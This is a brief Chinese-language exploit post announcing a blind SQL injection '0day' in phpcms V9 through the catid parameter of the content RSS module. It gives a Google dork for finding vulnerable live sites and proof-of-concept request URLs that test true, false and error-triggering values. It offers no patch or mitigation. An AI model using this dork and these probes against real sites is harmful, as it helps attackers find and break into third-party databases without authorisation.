phpcms V9 BLind SQL 注入漏洞0day

　　影响版本：phpcms v9 blind

　　官方网站：http://www.phpcms.cn

　　漏洞类型：sql注入

　　漏洞描述：phpcms v9 blind 参数过滤存在sql注入漏洞。

　　google dork:inurl:"index.php?m=content+c=rss+catid=10"

　　exploit & p0c

　　[!] index.php?m=content&c=rss&catid=[valid catid]

　　example p0c

　　[!] http://host/index.php?m=content&c=rss&catid=10 <= true

　　[!] http://host/index.php?m=content&c=rss&catid=-10 <= false

　　[+] http://host/index.php?m=content&c=rss&catid=5 <= show mysql error (table)